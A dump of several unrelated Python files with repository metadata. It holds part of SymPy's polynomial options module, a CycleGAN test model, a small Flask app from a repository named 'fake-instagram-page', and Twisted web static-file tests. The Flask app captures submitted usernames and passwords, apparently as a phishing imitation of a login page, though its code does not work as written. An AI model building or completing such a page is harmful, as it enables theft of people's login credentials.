if modulus.is_Integer and modulus > 0:
return int(modulus)
else:
raise OptionError(
"'modulus' must a positive integer, got %s" % modulus)
@classmethod
def postprocess(cls, options):
if 'modulus' in options:
modulus = options['modulus']
symmetric = options.get('symmetric', True)
options['domain'] = sympy.polys.domains.FF(modulus, symmetric)
class Symmetric(with_metaclass(OptionType, BooleanOption)):
"""``symmetric`` option to polynomial manipulation functions. """
option = 'symmetric'
requires = ['modulus']
excludes = ['greedy', 'domain', 'split', 'gaussian', 'extension']
class Strict(with_metaclass(OptionType, BooleanOption)):
"""``strict`` option to polynomial manipulation functions. """
option = 'strict'
@classmethod
def default(cls):
return True
class Auto(with_metaclass(OptionType, BooleanOption, Flag)):
"""``auto`` flag to polynomial manipulation functions. """
option = 'auto'
after = ['field', 'domain', 'extension', 'gaussian']
@classmethod
def default(cls):
return True
@classmethod
def postprocess(cls, options):
if ('domain' in options or 'field' in options) and 'auto' not in options:
options['auto'] = False
class Frac(with_metaclass(OptionType, BooleanOption, Flag)):
"""``auto`` option to polynomial manipulation functions. """
option = 'frac'
@classmethod
def default(cls):
return False
class Formal(with_metaclass(OptionType, BooleanOption, Flag)):
"""``formal`` flag to polynomial manipulation functions. """
option = 'formal'
@classmethod
def default(cls):
return False
class Polys(with_metaclass(OptionType, BooleanOption, Flag)):
"""``polys`` flag to polynomial manipulation functions. """
option = 'polys'
class Include(with_metaclass(OptionType, BooleanOption, Flag)):
"""``include`` flag to polynomial manipulation functions. """
option = 'include'
@classmethod
def default(cls):
return False
class All(with_metaclass(OptionType, BooleanOption, Flag)):
"""``all`` flag to polynomial manipulation functions. """
option = 'all'
@classmethod
def default(cls):
return False
class Gen(with_metaclass(OptionType, Flag)):
"""``gen`` flag to polynomial manipulation functions. """
option = 'gen'
@classmethod
def default(cls):
return 0
@classmethod
def preprocess(cls, gen):
if isinstance(gen, (Basic, int)):
return gen
else:
raise OptionError("invalid argument for 'gen' option")
class Symbols(with_metaclass(OptionType, Flag)):
"""``symbols`` flag to polynomial manipulation functions. """
option = 'symbols'
@classmethod
def default(cls):
return numbered_symbols('s', start=1)
@classmethod
def preprocess(cls, symbols):
if hasattr(symbols, '__iter__'):
return iter(symbols)
else:
raise OptionError("expected an iterator or iterable container, got %s" % symbols)
class Method(with_metaclass(OptionType, Flag)):
"""``method`` flag to polynomial manipulation functions. """
option = 'method'
@classmethod
def preprocess(cls, method):
if isinstance(method, str):
return method.lower()
else:
raise OptionError("expected a string, got %s" % method)
def build_options(gens, args=None):
"""Construct options from keyword arguments or ... options. """
if args is None:
gens, args = (), gens
if len(args) != 1 or 'opt' not in args or gens:
return Options(gens, args)
else:
return args['opt']
def allowed_flags(args, flags):
"""
Allow specified flags to be used in the given context.
Examples
========
>>> from sympy.polys.polyoptions import allowed_flags
>>> from sympy.polys.domains import ZZ
>>> allowed_flags({'domain': ZZ}, [])
>>> allowed_flags({'domain': ZZ, 'frac': True}, [])
Traceback (most recent call last):
...
FlagError: 'frac' flag is not allowed in this context
>>> allowed_flags({'domain': ZZ, 'frac': True}, ['frac'])
"""
flags = set(flags)
for arg in args.keys():
try:
if Options.__options__[arg].is_Flag and not arg in flags:
raise FlagError(
"'%s' flag is not allowed in this context" % arg)
except KeyError:
raise OptionError("'%s' is not a valid option" % arg)
def set_defaults(options, **defaults):
"""Update options with default values. """
if 'defaults' not in options:
options = dict(options)
options['defaults'] = defaults
return options
Options._init_dependencies_order()
| 27.249673 | 114 | 0.577905 | [
"MIT"
] | 18padx08/PPTex | PPTexEnv_x86_64/lib/python2.7/site-packages/sympy/polys/polyoptions.py | 20,846 | Python |
from .base_model import BaseModel
from . import networks
from .cycle_gan_model import CycleGANModel
class TestModel(BaseModel):
def name(self):
return 'TestModel'
@staticmethod
def modify_commandline_options(parser, is_train=True):
assert not is_train, 'TestModel cannot be used in train mode'
parser = CycleGANModel.modify_commandline_options(parser, is_train=False)
parser.set_defaults(dataset_mode='single')
parser.add_argument('--model_suffix', type=str, default='',
help='In checkpoints_dir, [epoch]_net_G[model_suffix].pth will'
' be loaded as the generator of TestModel')
return parser
def initialize(self, opt):
assert (not opt.isTrain)
BaseModel.initialize(self, opt)
# specify the training losses you want to print out. The program will call base_model.get_current_losses
self.loss_names = []
# specify the images you want to save/display. The program will call base_model.get_current_visuals
self.visual_names = ['real_A', 'fake_B']
# specify the models you want to save to the disk. The program will call base_model.save_networks and base_model.load_networks
self.model_names = ['G' + opt.model_suffix]
self.netG = networks.define_G(opt.input_nc, opt.output_nc, opt.ngf, opt.netG,
opt.norm, not opt.no_dropout, opt.init_type, opt.init_gain, self.gpu_ids)
# assigns the model to self.netG_[suffix] so that it can be loaded
# please see BaseModel.load_networks
setattr(self, 'netG' + opt.model_suffix, self.netG)
def set_input(self, input):
# we need to use single_dataset mode
self.real_A = input['A'].to(self.device)
self.image_paths = input['A_paths']
def forward(self):
self.fake_B = self.netG(self.real_A)
| 36.723404 | 128 | 0.741599 | [
"BSD-3-Clause"
] | yunyanxing/pairwise_xray_augmentation | models/test_model.py | 1,726 | Python |
from flask import Flask, render_template, url_for, request
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
db = SQLAlchemy(app)
app.config['SQLALCHEMY_TRACK MODIFICATIONS'] = False
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///db.sqlite3'
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(30))
password = db.Column(db.String(30))
@app.route('/', methods=['POST', 'GET'])
def login():
username = request.form['username']
password = request.form['password']
db.session.add(username)
db.session.add(password)
db.session.commit()
return render_template("index.html")
@app.route('/secret')
def secret():
return render_template("secret.html")
if __name__ == "__main__":
app.run(debug=True) | 25.870968 | 62 | 0.703242 | [
"Apache-2.0"
] | PrateekBing/fake-instagram-page | app.py | 802 | Python |
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted.web.static}.
"""
import errno
import inspect
import mimetypes
import os
import re
import sys
import warnings
from io import BytesIO as StringIO
from unittest import skipIf
from zope.interface.verify import verifyObject
from twisted.internet import abstract, interfaces
from twisted.python.runtime import platform
from twisted.python.filepath import FilePath
from twisted.python import compat, log
from twisted.python.compat import networkString
from twisted.trial.unittest import TestCase
from twisted.web import static, http, script, resource
from twisted.web.server import UnsupportedMethod
from twisted.web.test.requesthelper import DummyRequest
from twisted.web.test._util import _render
from twisted.web._responses import FOUND
class StaticDataTests(TestCase):
"""
Tests for L{Data}.
"""
def test_headRequest(self):
"""
L{Data.render} returns an empty response body for a I{HEAD} request.
"""
data = static.Data(b"foo", "bar")
request = DummyRequest([''])
request.method = b'HEAD'
d = _render(data, request)
def cbRendered(ignored):
self.assertEqual(b''.join(request.written), b"")
d.addCallback(cbRendered)
return d
def test_invalidMethod(self):
"""
L{Data.render} raises L{UnsupportedMethod} in response to a non-I{GET},
non-I{HEAD} request.
"""
data = static.Data(b"foo", b"bar")
request = DummyRequest([b''])
request.method = b'POST'
self.assertRaises(UnsupportedMethod, data.render, request)
class StaticFileTests(TestCase):
"""
Tests for the basic behavior of L{File}.
"""
def _render(self, resource, request):
return _render(resource, request)
def test_ignoredExtTrue(self):
"""
Passing C{1} as the value to L{File}'s C{ignoredExts} argument
issues a warning and sets the ignored extensions to the
wildcard C{"*"}.
"""
with warnings.catch_warnings(record=True) as caughtWarnings:
file = static.File(self.mktemp(), ignoredExts=1)
self.assertEqual(file.ignoredExts, ["*"])
self.assertEqual(len(caughtWarnings), 1)
def test_ignoredExtFalse(self):
"""
Passing C{1} as the value to L{File}'s C{ignoredExts} argument
issues a warning and sets the ignored extensions to the empty
list.
"""
with warnings.catch_warnings(record=True) as caughtWarnings:
file = static.File(self.mktemp(), ignoredExts=0)
self.assertEqual(file.ignoredExts, [])
self.assertEqual(len(caughtWarnings), 1)
def test_allowExt(self):
"""
Passing C{1} as the value to L{File}'s C{allowExt} argument
issues a warning and sets the ignored extensions to the
wildcard C{*}.
"""
with warnings.catch_warnings(record=True) as caughtWarnings:
file = static.File(self.mktemp(), ignoredExts=True)
self.assertEqual(file.ignoredExts, ["*"])
self.assertEqual(len(caughtWarnings), 1)
def test_invalidMethod(self):
"""
L{File.render} raises L{UnsupportedMethod} in response to a non-I{GET},
non-I{HEAD} request.
"""
request = DummyRequest([b''])
request.method = b'POST'
path = FilePath(self.mktemp())
path.setContent(b"foo")
file = static.File(path.path)
self.assertRaises(UnsupportedMethod, file.render, request)
def test_notFound(self):
"""
If a request is made which encounters a L{File} before a final segment
which does not correspond to any file in the path the L{File} was
created with, a not found response is sent.
"""
base = FilePath(self.mktemp())
base.makedirs()
file = static.File(base.path)
request = DummyRequest([b'foobar'])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(request.responseCode, 404)
d.addCallback(cbRendered)
return d
def test_emptyChild(self):
"""
The C{''} child of a L{File} which corresponds to a directory in the
filesystem is a L{DirectoryLister}.
"""
base = FilePath(self.mktemp())
base.makedirs()
file = static.File(base.path)
request = DummyRequest([b''])
child = resource.getChildForRequest(file, request)
self.assertIsInstance(child, static.DirectoryLister)
self.assertEqual(child.path, base.path)
def test_emptyChildUnicodeParent(self):
"""
The C{u''} child of a L{File} which corresponds to a directory
whose path is text is a L{DirectoryLister} that renders to a
binary listing.
@see: U{https://twistedmatrix.com/trac/ticket/9438}
"""
textBase = FilePath(self.mktemp()).asTextMode()
textBase.makedirs()
textBase.child(u"text-file").open('w').close()
textFile = static.File(textBase.path)
request = DummyRequest([b''])
child = resource.getChildForRequest(textFile, request)
self.assertIsInstance(child, static.DirectoryLister)
nativePath = compat.nativeString(textBase.path)
self.assertEqual(child.path, nativePath)
response = child.render(request)
self.assertIsInstance(response, bytes)
def test_securityViolationNotFound(self):
"""
If a request is made which encounters a L{File} before a final segment
which cannot be looked up in the filesystem due to security
considerations, a not found response is sent.
"""
base = FilePath(self.mktemp())
base.makedirs()
file = static.File(base.path)
request = DummyRequest([b'..'])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(request.responseCode, 404)
d.addCallback(cbRendered)
return d
@skipIf(platform.isWindows(), "Cannot remove read permission on Windows")
def test_forbiddenResource(self):
"""
If the file in the filesystem which would satisfy a request cannot be
read, L{File.render} sets the HTTP response code to I{FORBIDDEN}.
"""
base = FilePath(self.mktemp())
base.setContent(b'')
# Make sure we can delete the file later.
self.addCleanup(base.chmod, 0o700)
# Get rid of our own read permission.
base.chmod(0)
file = static.File(base.path)
request = DummyRequest([b''])
d = self._render(file, request)
def cbRendered(ignored):
self.assertEqual(request.responseCode, 403)
d.addCallback(cbRendered)
return d
def test_undecodablePath(self):
"""
A request whose path cannot be decoded as UTF-8 receives a not
found response, and the failure is logged.
"""
path = self.mktemp()
if isinstance(path, bytes):
path = path.decode('ascii')
base = FilePath(path)
base.makedirs()
file = static.File(base.path)
request = DummyRequest([b"\xff"])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(request.responseCode, 404)
self.assertEqual(len(self.flushLoggedErrors(UnicodeDecodeError)),
1)
d.addCallback(cbRendered)
return d
def test_forbiddenResource_default(self):
"""
L{File.forbidden} defaults to L{resource.ForbiddenResource}.
"""
self.assertIsInstance(
static.File(b'.').forbidden, resource.ForbiddenResource)
def test_forbiddenResource_customize(self):
"""
The resource rendered for forbidden requests is stored as a class
member so that users can customize it.
"""
base = FilePath(self.mktemp())
base.setContent(b'')
markerResponse = b'custom-forbidden-response'
def failingOpenForReading():
raise IOError(errno.EACCES, "")
class CustomForbiddenResource(resource.Resource):
def render(self, request):
return markerResponse
class CustomStaticFile(static.File):
forbidden = CustomForbiddenResource()
fileResource = CustomStaticFile(base.path)
fileResource.openForReading = failingOpenForReading
request = DummyRequest([b''])
result = fileResource.render(request)
self.assertEqual(markerResponse, result)
def test_indexNames(self):
"""
If a request is made which encounters a L{File} before a final empty
segment, a file in the L{File} instance's C{indexNames} list which
exists in the path the L{File} was created with is served as the
response to the request.
"""
base = FilePath(self.mktemp())
base.makedirs()
base.child("foo.bar").setContent(b"baz")
file = static.File(base.path)
file.indexNames = ['foo.bar']
request = DummyRequest([b''])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(b''.join(request.written), b'baz')
self.assertEqual(
request.responseHeaders.getRawHeaders(b'content-length')[0],
b'3')
d.addCallback(cbRendered)
return d
def test_staticFile(self):
"""
If a request is made which encounters a L{File} before a final segment
which names a file in the path the L{File} was created with, that file
is served as the response to the request.
"""
base = FilePath(self.mktemp())
base.makedirs()
base.child("foo.bar").setContent(b"baz")
file = static.File(base.path)
request = DummyRequest([b'foo.bar'])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(b''.join(request.written), b'baz')
self.assertEqual(
request.responseHeaders.getRawHeaders(b'content-length')[0],
b'3')
d.addCallback(cbRendered)
return d
@skipIf(sys.getfilesystemencoding().lower() not in ('utf-8', 'mcbs'),
"Cannot write unicode filenames with file system encoding of"
" {}".format(sys.getfilesystemencoding()))
def test_staticFileUnicodeFileName(self):
"""
A request for a existing unicode file path encoded as UTF-8
returns the contents of that file.
"""
name = u"\N{GREEK SMALL LETTER ETA WITH PERISPOMENI}"
content = b"content"
base = FilePath(self.mktemp())
base.makedirs()
base.child(name).setContent(content)
file = static.File(base.path)
request = DummyRequest([name.encode('utf-8')])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(b''.join(request.written), content)
self.assertEqual(
request.responseHeaders.getRawHeaders(b'content-length')[0],
networkString(str(len(content))))
d.addCallback(cbRendered)
return d
def test_staticFileDeletedGetChild(self):
"""
A L{static.File} created for a directory which does not exist should
return childNotFound from L{static.File.getChild}.
"""
staticFile = static.File(self.mktemp())
request = DummyRequest([b'foo.bar'])
child = staticFile.getChild(b"foo.bar", request)
self.assertEqual(child, staticFile.childNotFound)
def test_staticFileDeletedRender(self):
"""
A L{static.File} created for a file which does not exist should render
its C{childNotFound} page.
"""
staticFile = static.File(self.mktemp())
request = DummyRequest([b'foo.bar'])
request2 = DummyRequest([b'foo.bar'])
d = self._render(staticFile, request)
d2 = self._render(staticFile.childNotFound, request2)
def cbRendered2(ignored):
def cbRendered(ignored):
self.assertEqual(b''.join(request.written),
b''.join(request2.written))
d.addCallback(cbRendered)
return d
d2.addCallback(cbRendered2)
return d2
def test_getChildChildNotFound_customize(self):
"""
The resource rendered for child not found requests can be customize
using a class member.
"""
base = FilePath(self.mktemp())
base.setContent(b'')
markerResponse = b'custom-child-not-found-response'
class CustomChildNotFoundResource(resource.Resource):
def render(self, request):
return markerResponse
class CustomStaticFile(static.File):
childNotFound = CustomChildNotFoundResource()
fileResource = CustomStaticFile(base.path)
request = DummyRequest([b'no-child.txt'])
child = fileResource.getChild(b'no-child.txt', request)
result = child.render(request)
self.assertEqual(markerResponse, result)
def test_headRequest(self):
"""
L{static.File.render} returns an empty response body for I{HEAD}
requests.
"""
path = FilePath(self.mktemp())
path.setContent(b"foo")
file = static.File(path.path)
request = DummyRequest([b''])
request.method = b'HEAD'
d = _render(file, request)
def cbRendered(ignored):
self.assertEqual(b"".join(request.written), b"")
d.addCallback(cbRendered)
return d
def test_processors(self):
"""
If a request is made which encounters a L{File} before a final segment
which names a file with an extension which is in the L{File}'s
C{processors} mapping, the processor associated with that extension is
used to serve the response to the request.
"""
base = FilePath(self.mktemp())
base.makedirs()
base.child("foo.bar").setContent(
b"from twisted.web.static import Data\n"
b"resource = Data(b'dynamic world', 'text/plain')\n")
file = static.File(base.path)
file.processors = {'.bar': script.ResourceScript}
request = DummyRequest([b"foo.bar"])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(b''.join(request.written), b'dynamic world')
self.assertEqual(
request.responseHeaders.getRawHeaders(b'content-length')[0],
b'13')
d.addCallback(cbRendered)
return d
def test_ignoreExt(self):
"""
The list of ignored extensions can be set by passing a value to
L{File.__init__} or by calling L{File.ignoreExt} later.
"""
file = static.File(b".")
self.assertEqual(file.ignoredExts, [])
file.ignoreExt(".foo")
file.ignoreExt(".bar")
self.assertEqual(file.ignoredExts, [".foo", ".bar"])
file = static.File(b".", ignoredExts=(".bar", ".baz"))
self.assertEqual(file.ignoredExts, [".bar", ".baz"])
def test_ignoredExtensionsIgnored(self):
"""
A request for the I{base} child of a L{File} succeeds with a resource
for the I{base<extension>} file in the path the L{File} was created
with if such a file exists and the L{File} has been configured to
ignore the I{<extension>} extension.
"""
base = FilePath(self.mktemp())
base.makedirs()
base.child('foo.bar').setContent(b'baz')
base.child('foo.quux').setContent(b'foobar')
file = static.File(base.path, ignoredExts=(".bar",))
request = DummyRequest([b"foo"])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(b''.join(request.written), b'baz')
d.addCallback(cbRendered)
return d
def test_directoryWithoutTrailingSlashRedirects(self):
"""
A request for a path which is a directory but does not have a trailing
slash will be redirected to a URL which does have a slash by L{File}.
"""
base = FilePath(self.mktemp())
base.makedirs()
base.child('folder').makedirs()
file = static.File(base.path)
request = DummyRequest([b"folder"])
request.uri = b"http://dummy/folder#baz?foo=bar"
child = resource.getChildForRequest(file, request)
self.successResultOf(self._render(child, request))
self.assertEqual(request.responseCode, FOUND)
self.assertEqual(request.responseHeaders.getRawHeaders(b"location"),
[b"http://dummy/folder/#baz?foo=bar"])
def _makeFilePathWithStringIO(self):
"""
Create a L{File} that when opened for reading, returns a L{StringIO}.
@return: 2-tuple of the opened "file" and the L{File}.
@rtype: L{tuple}
"""
fakeFile = StringIO()
path = FilePath(self.mktemp())
path.touch()
file = static.File(path.path)
# Open our file instead of a real one
file.open = lambda: fakeFile
return fakeFile, file
def test_HEADClosesFile(self):
"""
A HEAD request opens the file, gets the size, and then closes it after
the request.
"""
fakeFile, file = self._makeFilePathWithStringIO()
request = DummyRequest([''])
request.method = b'HEAD'
self.successResultOf(_render(file, request))
self.assertEqual(b''.join(request.written), b'')
self.assertTrue(fakeFile.closed)
def test_cachedRequestClosesFile(self):
"""
A GET request that is cached closes the file after the request.
"""
fakeFile, file = self._makeFilePathWithStringIO()
request = DummyRequest([''])
request.method = b'GET'
# This request will always return saying that it is cached
request.setLastModified = lambda _: http.CACHED
self.successResultOf(_render(file, request))
self.assertEqual(b''.join(request.written), b'')
self.assertTrue(fakeFile.closed)
class StaticMakeProducerTests(TestCase):
"""
Tests for L{File.makeProducer}.
"""
def makeResourceWithContent(self, content, type=None, encoding=None):
"""
Make a L{static.File} resource that has C{content} for its content.
@param content: The L{bytes} to use as the contents of the resource.
@param type: Optional value for the content type of the resource.
"""
fileName = FilePath(self.mktemp())
fileName.setContent(content)
resource = static.File(fileName._asBytesPath())
resource.encoding = encoding
resource.type = type
return resource
def contentHeaders(self, request):
"""
Extract the content-* headers from the L{DummyRequest} C{request}.
This returns the subset of C{request.outgoingHeaders} of headers that
start with 'content-'.
"""
contentHeaders = {}
for k, v in request.responseHeaders.getAllRawHeaders():
if k.lower().startswith(b'content-'):
contentHeaders[k.lower()] = v[0]
return contentHeaders
def test_noRangeHeaderGivesNoRangeStaticProducer(self):
"""
makeProducer when no Range header is set returns an instance of
NoRangeStaticProducer.
"""
resource = self.makeResourceWithContent(b'')
request = DummyRequest([])
with resource.openForReading() as file:
producer = resource.makeProducer(request, file)
self.assertIsInstance(producer, static.NoRangeStaticProducer)
def test_noRangeHeaderSets200OK(self):
"""
makeProducer when no Range header is set sets the responseCode on the
request to 'OK'.
"""
resource = self.makeResourceWithContent(b'')
request = DummyRequest([])
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(http.OK, request.responseCode)
def test_noRangeHeaderSetsContentHeaders(self):
"""
makeProducer when no Range header is set sets the Content-* headers
for the response.
"""
length = 123
contentType = "text/plain"
contentEncoding = 'gzip'
resource = self.makeResourceWithContent(
b'a'*length, type=contentType, encoding=contentEncoding)
request = DummyRequest([])
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(
{b'content-type': networkString(contentType),
b'content-length': b'%d' % (length,),
b'content-encoding': networkString(contentEncoding)},
self.contentHeaders(request))
def test_singleRangeGivesSingleRangeStaticProducer(self):
"""
makeProducer when the Range header requests a single byte range
returns an instance of SingleRangeStaticProducer.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=1-3')
resource = self.makeResourceWithContent(b'abcdef')
with resource.openForReading() as file:
producer = resource.makeProducer(request, file)
self.assertIsInstance(producer, static.SingleRangeStaticProducer)
def test_singleRangeSets206PartialContent(self):
"""
makeProducer when the Range header requests a single, satisfiable byte
range sets the response code on the request to 'Partial Content'.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=1-3')
resource = self.makeResourceWithContent(b'abcdef')
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(
http.PARTIAL_CONTENT, request.responseCode)
def test_singleRangeSetsContentHeaders(self):
"""
makeProducer when the Range header requests a single, satisfiable byte
range sets the Content-* headers appropriately.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=1-3')
contentType = "text/plain"
contentEncoding = 'gzip'
resource = self.makeResourceWithContent(b'abcdef', type=contentType, encoding=contentEncoding)
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(
{b'content-type': networkString(contentType),
b'content-encoding': networkString(contentEncoding),
b'content-range': b'bytes 1-3/6', b'content-length': b'3'},
self.contentHeaders(request))
def test_singleUnsatisfiableRangeReturnsSingleRangeStaticProducer(self):
"""
makeProducer still returns an instance of L{SingleRangeStaticProducer}
when the Range header requests a single unsatisfiable byte range.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=4-10')
resource = self.makeResourceWithContent(b'abc')
with resource.openForReading() as file:
producer = resource.makeProducer(request, file)
self.assertIsInstance(producer, static.SingleRangeStaticProducer)
def test_singleUnsatisfiableRangeSets416ReqestedRangeNotSatisfiable(self):
"""
makeProducer sets the response code of the request to of 'Requested
Range Not Satisfiable' when the Range header requests a single
unsatisfiable byte range.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=4-10')
resource = self.makeResourceWithContent(b'abc')
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(
http.REQUESTED_RANGE_NOT_SATISFIABLE, request.responseCode)
def test_singleUnsatisfiableRangeSetsContentHeaders(self):
"""
makeProducer when the Range header requests a single, unsatisfiable
byte range sets the Content-* headers appropriately.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=4-10')
contentType = "text/plain"
resource = self.makeResourceWithContent(b'abc', type=contentType)
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(
{b'content-type': b'text/plain', b'content-length': b'0',
b'content-range': b'bytes */3'},
self.contentHeaders(request))
def test_singlePartiallyOverlappingRangeSetsContentHeaders(self):
"""
makeProducer when the Range header requests a single byte range that
partly overlaps the resource sets the Content-* headers appropriately.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=2-10')
contentType = "text/plain"
resource = self.makeResourceWithContent(b'abc', type=contentType)
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(
{b'content-type': b'text/plain', b'content-length': b'1',
b'content-range': b'bytes 2-2/3'},
self.contentHeaders(request))
def test_multipleRangeGivesMultipleRangeStaticProducer(self):
"""
makeProducer when the Range header requests a single byte range
returns an instance of MultipleRangeStaticProducer.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=1-3,5-6')
resource = self.makeResourceWithContent(b'abcdef')
with resource.openForReading() as file:
producer = resource.makeProducer(request, file)
self.assertIsInstance(producer, static.MultipleRangeStaticProducer)
def test_multipleRangeSets206PartialContent(self):
"""
makeProducer when the Range header requests a multiple satisfiable
byte ranges sets the response code on the request to 'Partial
Content'.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=1-3,5-6')
resource = self.makeResourceWithContent(b'abcdef')
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(
http.PARTIAL_CONTENT, request.responseCode)
def test_mutipleRangeSetsContentHeaders(self):
"""
makeProducer when the Range header requests a single, satisfiable byte
range sets the Content-* headers appropriately.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=1-3,5-6')
resource = self.makeResourceWithContent(
b'abcdefghijkl', encoding='gzip')
with resource.openForReading() as file:
producer = resource.makeProducer(request, file)
contentHeaders = self.contentHeaders(request)
# The only content-* headers set are content-type and content-length.
self.assertEqual(
set([b'content-length', b'content-type']),
set(contentHeaders.keys()))
# The content-length depends on the boundary used in the response.
expectedLength = 5
for boundary, offset, size in producer.rangeInfo:
expectedLength += len(boundary)
self.assertEqual(b'%d' % (expectedLength,),
contentHeaders[b'content-length'])
# Content-type should be set to a value indicating a multipart
# response and the boundary used to separate the parts.
self.assertIn(b'content-type', contentHeaders)
contentType = contentHeaders[b'content-type']
self.assertNotIdentical(
None, re.match(
b'multipart/byteranges; boundary="[^"]*"\Z', contentType))
# Content-encoding is not set in the response to a multiple range
# response, which is a bit wussy but works well enough with the way
# static.File does content-encodings...
self.assertNotIn(b'content-encoding', contentHeaders)
def test_multipleUnsatisfiableRangesReturnsMultipleRangeStaticProducer(self):
"""
makeProducer still returns an instance of L{SingleRangeStaticProducer}
when the Range header requests multiple ranges, none of which are
satisfiable.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=10-12,15-20')
resource = self.makeResourceWithContent(b'abc')
with resource.openForReading() as file:
producer = resource.makeProducer(request, file)
self.assertIsInstance(producer, static.MultipleRangeStaticProducer)
def test_multipleUnsatisfiableRangesSets416ReqestedRangeNotSatisfiable(self):
"""
makeProducer sets the response code of the request to of 'Requested
Range Not Satisfiable' when the Range header requests multiple ranges,
none of which are satisfiable.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=10-12,15-20')
resource = self.makeResourceWithContent(b'abc')
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(
http.REQUESTED_RANGE_NOT_SATISFIABLE, request.responseCode)
def test_multipleUnsatisfiableRangeSetsContentHeaders(self):
"""
makeProducer when the Range header requests multiple ranges, none of
which are satisfiable, sets the Content-* headers appropriately.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=4-10')
contentType = "text/plain"
request.requestHeaders.addRawHeader(b'range', b'bytes=10-12,15-20')
resource = self.makeResourceWithContent(b'abc', type=contentType)
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(
{b'content-length': b'0',
b'content-range': b'bytes */3',
b'content-type': b'text/plain'},
self.contentHeaders(request))
def test_oneSatisfiableRangeIsEnough(self):
"""
makeProducer when the Range header requests multiple ranges, at least
one of which matches, sets the response code to 'Partial Content'.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=1-3,100-200')
resource = self.makeResourceWithContent(b'abcdef')
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(
http.PARTIAL_CONTENT, request.responseCode)
class StaticProducerTests(TestCase):
"""
Tests for the abstract L{StaticProducer}.
"""
def test_stopProducingClosesFile(self):
"""
L{StaticProducer.stopProducing} closes the file object the producer is
producing data from.
"""
fileObject = StringIO()
producer = static.StaticProducer(None, fileObject)
producer.stopProducing()
self.assertTrue(fileObject.closed)
def test_stopProducingSetsRequestToNone(self):
"""
L{StaticProducer.stopProducing} sets the request instance variable to
None, which indicates to subclasses' resumeProducing methods that no
more data should be produced.
"""
fileObject = StringIO()
producer = static.StaticProducer(DummyRequest([]), fileObject)
producer.stopProducing()
self.assertIdentical(None, producer.request)
class NoRangeStaticProducerTests(TestCase):
"""
Tests for L{NoRangeStaticProducer}.
"""
def test_implementsIPullProducer(self):
"""
L{NoRangeStaticProducer} implements L{IPullProducer}.
"""
verifyObject(
interfaces.IPullProducer,
static.NoRangeStaticProducer(None, None))
def test_resumeProducingProducesContent(self):
"""
L{NoRangeStaticProducer.resumeProducing} writes content from the
resource to the request.
"""
request = DummyRequest([])
content = b'abcdef'
producer = static.NoRangeStaticProducer(
request, StringIO(content))
# start calls registerProducer on the DummyRequest, which pulls all
# output from the producer and so we just need this one call.
producer.start()
self.assertEqual(content, b''.join(request.written))
def test_resumeProducingBuffersOutput(self):
"""
L{NoRangeStaticProducer.start} writes at most
C{abstract.FileDescriptor.bufferSize} bytes of content from the
resource to the request at once.
"""
request = DummyRequest([])
bufferSize = abstract.FileDescriptor.bufferSize
content = b'a' * (2*bufferSize + 1)
producer = static.NoRangeStaticProducer(
request, StringIO(content))
# start calls registerProducer on the DummyRequest, which pulls all
# output from the producer and so we just need this one call.
producer.start()
expected = [
content[0:bufferSize],
content[bufferSize:2*bufferSize],
content[2*bufferSize:]
]
self.assertEqual(expected, request.written)
def test_finishCalledWhenDone(self):
"""
L{NoRangeStaticProducer.resumeProducing} calls finish() on the request
after it is done producing content.
"""
request = DummyRequest([])
finishDeferred = request.notifyFinish()
callbackList = []
finishDeferred.addCallback(callbackList.append)
producer = static.NoRangeStaticProducer(
request, StringIO(b'abcdef'))
# start calls registerProducer on the DummyRequest, which pulls all
# output from the producer and so we just need this one call.
producer.start()
self.assertEqual([None], callbackList)
class SingleRangeStaticProducerTests(TestCase):
"""
Tests for L{SingleRangeStaticProducer}.
"""
def test_implementsIPullProducer(self):
"""
L{SingleRangeStaticProducer} implements L{IPullProducer}.
"""
verifyObject(
interfaces.IPullProducer,
static.SingleRangeStaticProducer(None, None, None, None))
